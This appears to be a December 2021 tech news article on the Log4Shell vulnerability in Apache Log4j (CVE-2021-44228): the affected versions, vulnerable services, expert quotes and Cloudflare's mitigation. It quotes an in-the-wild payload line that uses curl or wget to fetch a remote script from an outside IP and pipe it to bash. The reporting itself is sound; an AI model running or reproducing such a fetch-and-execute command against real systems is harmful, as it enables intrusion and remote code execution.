Zero-day exploits are about as bad as it gets, especially when they’re identified in software as ubiquitous as Apache’s Log4j logging library. A proof-of-concept exploit was shared online that exposes everyone to potential remote code execution (RCE) attacks, and it affected some of the largest services on the web. The exploit has been identified as “actively being exploited”, and is one of the most dangerous exploits to be made public in recent years.
Log4j is a popular Java-based logging package developed by the Apache Software Foundation, and CVE-2021-44228 affects all versions of Log4j between version 2.0-beta-9 and version 2.14.1. It has been patched in the most recent version of the library, version 2.15.0, released a few days ago. Many services and applications rely on Log4j, including games like Minecraft, where the vulnerability was first discovered. Cloud services such as Steam and Apple iCloud were also found to be vulnerable, and it’s likely that anybody using Apache Struts is too. Even changing an iPhone’s name was shown to trigger the vulnerability on Apple’s servers.
This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud Security Team. Any service that logs user-controlled strings was vulnerable to the exploit. The logging of user-controlled strings is a common practice by system administrators in order to spot potential platform abuse, though those strings should then be “sanitized” — the process of cleaning user input to ensure that there is nothing harmful to the software being submitted.
Log4Shell rivals Heartbleed in its severity
The exploit has been dubbed “Log4Shell”, as it’s an unauthenticated RCE vulnerability that allows for total system takeover. There’s already a proof-of-concept exploit online, and it’s ridiculously easy to demonstrate that it works through the use of DNS logging software. If you remember the Heartbleed vulnerability from a number of years ago, Log4Shell definitely gives it a run for its money when it comes to severity.
“Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come,” the Randori Attack Team said in their blog today. “Due to the ease of exploitation and the breadth of applicability, we suspect ransomware actors to begin leveraging this vulnerability immediately,” they added. Malicious actors are already mass-scanning the web to try and find servers to exploit (via Bleeping Computer).
Example CVE-2021-44228 payload:
(curl -s 220.127.116.11/lh.sh||wget -q -O- 18.104.22.168/lh.sh)|bash
22.214.171.124 (🇷🇺) pic.twitter.com/LKdaZ9Lfos
— Bad Packets (@bad_packets) December 10, 2021
“Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,” LunaSec wrote. “Anybody using Apache Struts is likely vulnerable. We’ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach.” LunaSec also said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less affected in theory, though hackers may still be able to work around the limitations.
— Cas van Cooten (@chvancooten) December 10, 2021
The vulnerability can be triggered by something as mundane as an iPhone’s name, demonstrating that Log4j truly is everywhere. If a Java class is appended to the end of the URL, then that class will be injected into the server process. System administrators with recent versions of Log4j can execute their JVM with the following argument to also prevent the vulnerability from being exploited, so long as they’re on at least Log4j 2.10.
CERT NZ (New Zealand’s national Computer Emergency Response Team) has issued a security advisory warning of active exploitation in the wild, and this has also been confirmed by Coalition Director Of Engineering – Security Tiago Henriques and security expert Kevin Beaumont. The vulnerability has also been deemed so dangerous by Cloudflare that all customers are granted “some” protection by default.
We’ve made the determination that #Log4J is so bad we’re going to try and roll out at least some protection for all @Cloudflare customers by default, even free customers who do not have our WAF. Working on how to do that safely now.
— Matthew Prince 🌥 (@eastdakota) December 10, 2021
This is an incredibly dangerous exploit and one that can wreak havoc online. We’ll be keeping a close eye on what happens next.